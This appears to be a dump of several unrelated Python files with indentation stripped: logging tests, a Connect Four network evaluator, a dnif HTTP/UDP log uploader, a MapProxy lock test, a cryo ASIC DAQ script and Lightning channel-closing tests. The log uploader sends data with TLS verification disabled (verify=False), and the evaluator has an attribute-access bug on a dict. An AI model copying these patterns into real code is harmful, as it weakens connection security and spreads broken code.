print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
evaluator_c4.py | #!/usr/bin/env python
import os.path
import torch
import numpy as np
from alpha_net_c4 import ConnectNet
from connect_board import board as cboard
import encoder_decoder_c4 as ed
import copy
from MCTS_c4 import UCT_search, do_decode_n_move_pieces, get_policy
import pickle
import torch.multiprocessing as mp
import datetime
import logging
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s', \
datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
logger = logging.getLogger(__file__)
def save_as_pickle(filename, data):
completeName = os.path.join("./evaluator_data/",\
filename)
with open(completeName, 'wb') as output:
pickle.dump(data, output)
def load_pickle(filename):
completeName = os.path.join("./evaluator_data/",\
filename)
with open(completeName, 'rb') as pkl_file:
data = pickle.load(pkl_file)
return data
class arena():
def __init__(self, current_cnet, best_cnet):
self.current = current_cnet
self.best = best_cnet
def play_round(self):
logger.info("Starting game round...")
if np.random.uniform(0,1) <= 0.5:
white = self.current; black = self.best; w = "current"; b = "best"
else:
white = self.best; black = self.current; w = "best"; b = "current"
current_board = cboard()
checkmate = False
dataset = []
value = 0
t = 0.1
while not checkmate and current_board.actions() != []:
dataset.append(copy.deepcopy(ed.encode_board(current_board)))
print(""); print(current_board.current_board)
if current_board.player == 0:
root = UCT_search(current_board,777,white,t)
policy = get_policy(root, t); print("Policy: ", policy, "white = %s" %(str(w)))
elif current_board.player == 1:
root = UCT_search(current_board,777,black,t)
policy = get_policy(root, t); print("Policy: ", policy, "black = %s" %(str(b)))
current_board = do_decode_n_move_pieces(current_board,\
np.random.choice(np.array([0,1,2,3,4,5,6]), \
p = policy)) # decode move and move piece(s)
if current_board.check_winner() == True: # someone wins
if current_board.player == 0: # black wins
value = -1
elif current_board.player == 1: # white wins
value = 1
checkmate = True
dataset.append(ed.encode_board(current_board))
if value == -1:
dataset.append(f"{b} as black wins")
return b, dataset
elif value == 1:
dataset.append(f"{w} as white wins")
return w, dataset
else:
dataset.append("Nobody wins")
return None, dataset
def evaluate(self, num_games, cpu):
current_wins = 0
logger.info("[CPU %d]: Starting games..." % cpu)
for i in range(num_games):
with torch.no_grad():
winner, dataset = self.play_round(); print("%s wins!" % winner)
if winner == "current":
current_wins += 1
save_as_pickle("evaluate_net_dataset_cpu%i_%i_%s_%s" % (cpu,i,datetime.datetime.today().strftime("%Y-%m-%d"),\
str(winner)),dataset)
print("Current_net wins ratio: %.5f" % (current_wins/num_games))
save_as_pickle("wins_cpu_%i" % (cpu),\
{"best_win_ratio": current_wins/num_games, "num_games":num_games})
logger.info("[CPU %d]: Finished arena games!" % cpu)
def fork_process(arena_obj, num_games, cpu): # make arena picklable
arena_obj.evaluate(num_games, cpu)
def evaluate_nets(args, iteration_1, iteration_2):
logger.info("Loading nets...")
current_net="%s_iter%d.pth.tar" % (args.neural_net_name, iteration_2)
best_net="%s_iter%d.pth.tar" % (args.neural_net_name, iteration_1)
current_net_filename = os.path.join("./model_data/",\
current_net)
best_net_filename = os.path.join("./model_data/",\
best_net)
logger.info("Current net: %s" % current_net)
logger.info("Previous (Best) net: %s" % best_net)
current_cnet = ConnectNet()
best_cnet = ConnectNet()
if cuda := torch.cuda.is_available():
current_cnet.cuda()
best_cnet.cuda()
if not os.path.isdir("./evaluator_data/"):
os.mkdir("evaluator_data")
if args.MCTS_num_processes > 1:
mp.set_start_method("spawn",force=True)
current_cnet.share_memory()
best_cnet.share_memory()
current_cnet.eval()
best_cnet.eval()
checkpoint = torch.load(current_net_filename)
current_cnet.load_state_dict(checkpoint['state_dict'])
checkpoint = torch.load(best_net_filename)
best_cnet.load_state_dict(checkpoint['state_dict'])
processes = []
if args.MCTS_num_processes > mp.cpu_count():
num_processes = mp.cpu_count()
logger.info("Required number of processes exceed number of CPUs! Setting MCTS_num_processes to %d" % num_processes)
else:
num_processes = args.MCTS_num_processes
logger.info("Spawning %d processes..." % num_processes)
with torch.no_grad():
for i in range(num_processes):
p = mp.Process(target=fork_process,args=(arena(current_cnet,best_cnet), args.num_evaluator_games, i))
p.start()
processes.append(p)
for p in processes:
p.join()
wins_ratio = 0.0
for i in range(num_processes):
stats = load_pickle("wins_cpu_%i" % (i))
wins_ratio += stats['best_win_ratio']
wins_ratio /= num_processes
return iteration_2 if wins_ratio >= 0.55 else iteration_1
elif args.MCTS_num_processes == 1:
current_cnet.eval()
best_cnet.eval()
checkpoint = torch.load(current_net_filename)
current_cnet.load_state_dict(checkpoint['state_dict'])
checkpoint = torch.load(best_net_filename)
best_cnet.load_state_dict(checkpoint['state_dict'])
arena1 = arena(current_cnet=current_cnet, best_cnet=best_cnet)
arena1.evaluate(num_games=args.num_evaluator_games, cpu=0)
stats = load_pickle("wins_cpu_%i" % (0))
return iteration_2 if stats.best_win_ratio >= 0.55 else iteration_1 |
consumer.py | import logging
import socket
import threading
from Queue import Queue, Full, Empty
import requests
import time
from dnif.exception import DnifException
class Consumer(object):
def start(self, data, **kwargs):
raise NotImplementedError
def stop(self, data, **kwargs):
raise NotImplementedError
def send(self, data):
raise NotImplementedError
class AsyncBufferedConsumer(Consumer):
""" (Abstract) Consumer that uploads logs asynchronously in the background . """
def __init__(self, buffer_size=1024):
"""
Initialize the Consumer
:param buffer_size: Max number of pending payloads to hold (in memory).
If the queue is full, further payloads will be dropped
"""
self._queue = Queue(maxsize=buffer_size)
self._logger = logging.getLogger('dnif.consumer.' + self.__class__.__name__)
self._stop = self._force_stop = True
self._thread = None
def start(self, daemon=False, **kwargs):
""" Start uploading. Running in daemon mode could cause data loss!
:param daemon: if this is true, background thread will stop automatically with program completion
without the need to explicitly call stop()
"""
if self._thread and self._thread.isAlive():
raise DnifException('already running')
self._stop = self._force_stop = False
self._thread = threading.Thread(target=self.upload)
self._thread.daemon = bool(daemon)
self._thread.start()
def stop(self, force=False, **kwargs):
""" Stop uploading. Forcing stop could cause data loss!
:param force: stops upload immediately, dropping any pending uploads
"""
self._stop = True
self._force_stop = force
def send(self, data):
""" Send the data to the target endpoint.
This method only queues the upload, the upload itself happens asynchronously in the background.
:param data: Data to upload
"""
if self._stop:
# don't add to the worker thread's burden after stop has been signalled
return
data = self.validate(data)
if not data:
return
try:
self._queue.put(data, block=False)
except Full:
self._logger.info('Dropping data because max buffer size reached: {0}'.format(data))
def validate(self, data):
"""
Validate the data packet, and return the validated packet
:param data: the data packet to send
"""
raise NotImplementedError
def upload(self):
"""
Actually upload
"""
raise NotImplementedError
class AsyncHttpConsumer(AsyncBufferedConsumer):
""" Consumer that uploads logs to the specified endpoint using HTTP. """
def __init__(self, url, buffer_size=1024, batch_size=100):
"""
:param url: The target URL
:param buffer_size: Max number of pending payloads to hold (in memory).
"""
self._url = url
self._timeout = 15
self._batch_size = batch_size
super(AsyncHttpConsumer, self).__init__(buffer_size)
def _validate_unit(self, data):
""" Validate that data does not contain nested JSON objects. Lists are allowed. """
for key, value in data.items():
if isinstance(value, dict):
self._logger.info('Skipping sending data packet. Nested JSON objects are not allowed: {0}'.format(data))
return False
return True
def validate(self, data):
if not isinstance(data, (dict, list, tuple)):
self._logger.info('Skipping sending data packet. Data must be list/dict: {0}'.format(data))
return None
if isinstance(data, dict):
data = [data]
final = []
for d in data:
if self._validate_unit(d):
final.append(d)
return final
def upload(self):
while not self._force_stop:
contents = []
try:
for i in range(self._batch_size):
data = self._queue.get_nowait()
if isinstance(data, list):
contents.extend(data)
else:
contents.append(data)
except Empty:
pass
if not contents:
if self._stop:
# loop's primary exit condition
break
time.sleep(1)
else:
# check force stop flag again before making request
if self._force_stop:
break
try:
resp = requests.post(self._url, json=contents, timeout=self._timeout, verify=False)
# self._logger.debug(resp.status_code)
except Exception as ex:
self._logger.info('Error uploading log: {0}'.format(ex))
self._logger.info('Background uploader stopped.')
class AsyncUDPConsumer(AsyncBufferedConsumer):
""" Consumer that uploads logs to the specified endpoint using UDP """
def __init__(self, target_ip, target_port, buffer_size=1024):
"""
Initialize
:param target_ip: The target UDP ip
:param target_port: The target UDP port
:param buffer_size: Max number of pending payloads to hold (in memory).
"""
self._target_ip = target_ip
self._target_port = target_port
super(AsyncUDPConsumer, self).__init__(buffer_size)
def validate(self, data):
if isinstance(data, (str, unicode)):
return data
else:
self._logger.info('Skipping sending data packet. Expected str/unicode: {0}'.format(data))
return None
def upload(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while not self._force_stop:
try:
message = self._queue.get(block=True, timeout=1)
# check force stopped flag again before making request
if self._force_stop:
break
try:
sock.sendto(message, (self._target_ip, self._target_port))
except Exception as ex:
self._logger.info('Error uploading log: {0}'.format(ex))
except Empty:
if self._stop:
break # loop's primary exit condition
sock.close()
self._logger.info('Background uploader stopped.')
|
test_seed_cachelock.py | # This file is part of the MapProxy project.
# Copyright (C) 2012 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import time
import sys
import pytest
from mapproxy.seed.cachelock import CacheLocker, CacheLockedError
@pytest.mark.skipif(sys.platform == "win32", reason="test not supported for Windows")
class TestCacheLock(object):
@pytest.fixture
def lock_file(self, tmpdir):
return (tmpdir / "lock").strpath
def test_free_lock(self, lock_file):
locker = CacheLocker(lock_file)
with locker.lock("foo"):
assert True
def test_locked_by_process_no_block(self, lock_file):
proc_is_locked = multiprocessing.Event()
def lock():
locker = CacheLocker(lock_file)
with locker.lock("foo"):
proc_is_locked.set()
time.sleep(10)
p = multiprocessing.Process(target=lock)
p.start()
# wait for process to start
proc_is_locked.wait()
locker = CacheLocker(lock_file)
# test unlocked bar
with locker.lock("bar", no_block=True):
assert True
# test locked foo
try:
with locker.lock("foo", no_block=True):
assert False
except CacheLockedError:
pass
finally:
p.terminate()
p.join()
def test_locked_by_process_waiting(self, lock_file):
proc_is_locked = multiprocessing.Event()
def lock():
locker = CacheLocker(lock_file)
with locker.lock("foo"):
proc_is_locked.set()
time.sleep(.1)
p = multiprocessing.Process(target=lock)
start_time = time.time()
p.start()
# wait for process to start
proc_is_locked.wait()
locker = CacheLocker(lock_file, polltime=0.02)
try:
with locker.lock("foo", no_block=False):
diff = time.time() - start_time
assert diff > 0.1
finally:
p.terminate()
p.join()
|
cryoDaq.py | #!/usr/bin/env python3
#-----------------------------------------------------------------------------
# Title : cryo DAQ top module (based on ePix HR readout)
#-----------------------------------------------------------------------------
# File : cryoDAQ.py evolved from evalBoard.py
# Created : 2018-06-12
# Last update: 2018-06-12
#-----------------------------------------------------------------------------
# Description:
# Rogue interface to cryo ASIC based on ePix HR boards
#-----------------------------------------------------------------------------
# This file is part of the rogue_example software. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue_example software, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import setupLibPaths
import pyrogue as pr
import pyrogue.utilities.prbs
import pyrogue.utilities.fileio
import pyrogue.interfaces.simulation
import pyrogue.gui
import rogue.hardware.pgp
import rogue.protocols
import surf
import surf.axi
import surf.protocols.ssi
from XilinxKcu1500Pgp3.XilinxKcu1500Pgp3 import *
import threading
import signal
import atexit
import yaml
import time
import argparse
import sys
#import testBridge
import ePixViewer as vi
import ePixFpga as fpga
try:
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
except ImportError:
from PyQt4.QtCore import *
from PyQt4.QtGui import *
# Set the argument parser
parser = argparse.ArgumentParser()
# Convert str to bool
argBool = lambda s: s.lower() in ['true', 't', 'yes', '1']
# Add arguments
parser.add_argument(
"--type",
type = str,
required = True,
help = "define the PCIe card type (either pgp-gen3 or kcu1500)",
)
parser.add_argument(
"--start_gui",
type = argBool,
required = False,
default = True,
help = "true to show gui",
)
parser.add_argument(
"--viewer",
type = argBool,
required = False,
default = True,
help = "Start viewer",
)
parser.add_argument(
"--verbose",
type = argBool,
required = False,
default = False,
help = "true for verbose printout",
)
# Get the arguments
args = parser.parse_args()
#############################################
START_VIEWER = args.viewer
print(args.viewer)
#############################################
# Add PGP virtual channels
if ( args.type == 'pgp-gen3' ):
# Create the PGP interfaces for ePix hr camera
pgpL0Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,0) # Data & cmds
pgpL0Vc1 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,1) # Registers for ePix board
pgpL0Vc2 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,2) # PseudoScope
pgpL0Vc3 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,3) # Monitoring (Slow ADC)
#pgpL1Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,0) # Data (when using all four lanes it should be swapped back with L0)
pgpL2Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',2,0) # Data
pgpL3Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',3,0) # Data
print("")
print("PGP Card Version: %x" % (pgpL0Vc0.getInfo().version))
elif ( args.type == 'kcu1500' ):
# Create the PGP interfaces for ePix hr camera
pgpL0Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+0, True) # Data & cmds
pgpL0Vc1 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+1, True) # Registers for ePix board
pgpL0Vc2 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+2, True) # PseudoScope
pgpL0Vc3 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+3, True) # Monitoring (Slow ADC)
#pgpL1Vc0 = rogue.hardware.data.DataCard('/dev/datadev_0',(0*32)+0) # Data (when using all four lanes it should be swapped back with L0)
pgpL2Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(2*32)+0, True) # Data
pgpL3Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(3*32)+0, True) # Data
elif ( args.type == 'SIM' ):
print('Sim mode')
simPort = 11000
rogue.Logging.setFilter('pyrogue.SrpV3', rogue.Logging.Debug)
pgpL0Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*0) # VC0
pgpL0Vc1 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*1) # VC1
pgpL0Vc2 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*2) # VC2
pgpL0Vc3 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*3) # VC3
pgpL2Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*2)+2*0) # L2VC0
pgpL3Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*3)+2*0) # L3VC0
#pgpL0Vc0 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=0, uid=1, ssi=True)
#pgpL0Vc1 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=1, uid=1, ssi=True)
#pgpL0Vc2 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=2, uid=1, ssi=True)
#pgpL0Vc3 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=3, uid=1, ssi=True)
#pgpL2Vc0 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=0, uid=2, ssi=True)
#pgpL3Vc0 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=0, uid=3, ssi=True)
elif ( args.type == 'dataFile' ):
print("Bypassing hardware.")
else:
raise ValueError("Invalid type (%s)" % (args.type) )
# Add data stream to file as channel 1 File writer
dataWriter = pyrogue.utilities.fileio.StreamWriter(name='dataWriter')
if ( args.type != 'dataFile' ):
pyrogue.streamConnect(pgpL0Vc0, dataWriter.getChannel(0x1))
pyrogue.streamConnect(pgpL0Vc2, dataWriter.getChannel(0x2))
cmd = rogue.protocols.srp.Cmd()
if ( args.type != 'dataFile' ):
pyrogue.streamConnect(cmd, pgpL0Vc0)
# Create and Connect SRP to VC1 to send commands
srp = rogue.protocols.srp.SrpV3()
if ( args.type != 'dataFile' ):
pyrogue.streamConnectBiDir(pgpL0Vc1,srp)
#############################################
# Microblaze console printout
#############################################
class MbDebug(rogue.interfaces.stream.Slave):
def __init__(self):
rogue.interfaces.stream.Slave.__init__(self)
self.enable = False
def _acceptFrame(self,frame):
if self.enable:
p = bytearray(frame.getPayload())
frame.read(p,0)
print('-------- Microblaze Console --------')
print(p.decode('utf-8'))
#######################################
# Custom run control
#######################################
class MyRunControl(pyrogue.RunControl):
def __init__(self,name):
pyrogue.RunControl.__init__(self,name, description='Run Controller ePix HR empty', rates={1:'1 Hz', 2:'2 Hz', 4:'4 Hz', 8:'8 Hz', 10:'10 Hz', 30:'30 Hz', 60:'60 Hz', 120:'120 Hz'})
self._thread = None
def _setRunState(self,dev,var,value,changed):
if changed:
if self.runState.get(read=False) == 'Running':
self._thread = threading.Thread(target=self._run)
self._thread.start()
else:
self._thread.join()
self._thread = None
def _run(self):
self.runCount.set(0)
self._last = int(time.time())
while (self.runState.value() == 'Running'):
delay = 1.0 / ({value: key for key,value in self.runRate.enum.items()}[self._runRate])
time.sleep(delay)
self._root.ssiPrbsTx.oneShot()
self._runCount += 1
if self._last != int(time.time()):
self._last = int(time.time())
self.runCount._updated()
##############################
# Set base
##############################
class Board(pyrogue.Root):
def __init__(self, guiTop, cmd, dataWriter, srp, **kwargs):
super().__init__(name='cryoAsicGen1',description='cryo ASIC', **kwargs)
self.add(dataWriter)
self.guiTop = guiTop
self.cmd = cmd
@self.command()
def Trigger():
self.cmd.sendCmd(0, 0)
# Add Devices
if ( args.type == 'kcu1500' ):
coreMap = rogue.hardware.axi.AxiMemMap('/dev/datadev_0')
self.add(XilinxKcu1500Pgp3(memBase=coreMap))
self.add(fpga.EpixHRGen1Cryo(name='EpixHRGen1Cryo', offset=0, memBase=srp, hidden=False, enabled=True))
self.add(pyrogue.RunControl(name = 'runControl', description='Run Controller hr', cmd=self.Trigger, rates={1:'1 Hz', 2:'2 Hz', 4:'4 Hz', 8:'8 Hz', 10:'10 Hz', 30:'30 Hz', 60:'60 Hz', 120:'120 Hz'}))
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 0[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL0Vc0, dbgData)
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 1[{}]".format(0))
# if (args.verbose): pyrogue.streamTap(pgpL1Vc0, dbgData)
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 2[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL2Vc0, dbgData)
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 3[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL3Vc0, dbgData)
# Create GUI
appTop = QApplication(sys.argv)
guiTop = pyrogue.gui.GuiTop(group='cryoAsicGui')
cryoAsicBoard = Board(guiTop, cmd, dataWriter, srp)
if ( args.type == 'dataFile' or args.type == 'SIM'):
cryoAsicBoard.start(pollEn=False, pyroGroup=None)
else:
cryoAsicBoard.start(pollEn=True, pyroGroup=None)
guiTop.addTree(cryoAsicBoard)
guiTop.resize(800,800)
# Viewer gui
if START_VIEWER:
onlineViewer = vi.Window(cameraType='cryo64xN')
onlineViewer.eventReader.frameIndex = 0
onlineViewer.setReadDelay(0)
pyrogue.streamTap(pgpL0Vc0, onlineViewer.eventReader)
if ( args.type != 'dataFile' ):
pyrogue.streamTap(pgpL0Vc2, onlineViewer.eventReaderScope)# PseudoScope
#pyrogue.streamTap(pgpL0Vc3, onlineViewer.eventReaderMonitoring) # Slow Monitoring
# Create GUI
if (args.start_gui):
appTop.exec_()
# Close window and stop polling
cryoAsicBoard.stop()
exit()
|
test_closing.py | from fixtures import * # noqa: F401,F403
from flaky import flaky
from pyln.client import RpcError, Millisatoshi
from shutil import copyfile
from pyln.testing.utils import SLOW_MACHINE
from utils import (
only_one, sync_blockheight, wait_for, TIMEOUT,
account_balance, first_channel_id, closing_fee, TEST_NETWORK,
scriptpubkey_addr, calc_lease_fee, EXPERIMENTAL_FEATURES,
check_utxos_channel, anchor_expected, check_coin_moves,
check_balance_snaps, mine_funding_to_announce
)
import os
import queue
import pytest
import re
import subprocess
import threading
import unittest
@pytest.mark.developer("Too slow without --dev-bitcoind-poll")
def test_closing_simple(node_factory, bitcoind, chainparams):
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
chan = l1.get_channel_scid(l2)
channel_id = first_channel_id(l1, l2)
fee = closing_fee(3750, 2) if not chainparams['elements'] else 4263
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None), ('external', ['to_them'], None, None)],
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None), ('external', ['to_them'], None, None)],
}
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
def test_closing_while_disconnected(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_disconnected_notify(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l2.stop()
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
out = subprocess.check_output(['cli/lightning-cli',
'--network={}'.format(TEST_NETWORK),
'--lightning-dir={}'
.format(l1.daemon.lightning_dir),
'close',
l2.info['id'],
'5']).decode('utf-8').splitlines()
assert out[0] == '# peer is offline, will negotiate once they reconnect (5 seconds before unilateral close).'
assert out[1] == '# Timed out, forcing close.'
assert not any([line.startswith('#') for line in out[2:]])
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
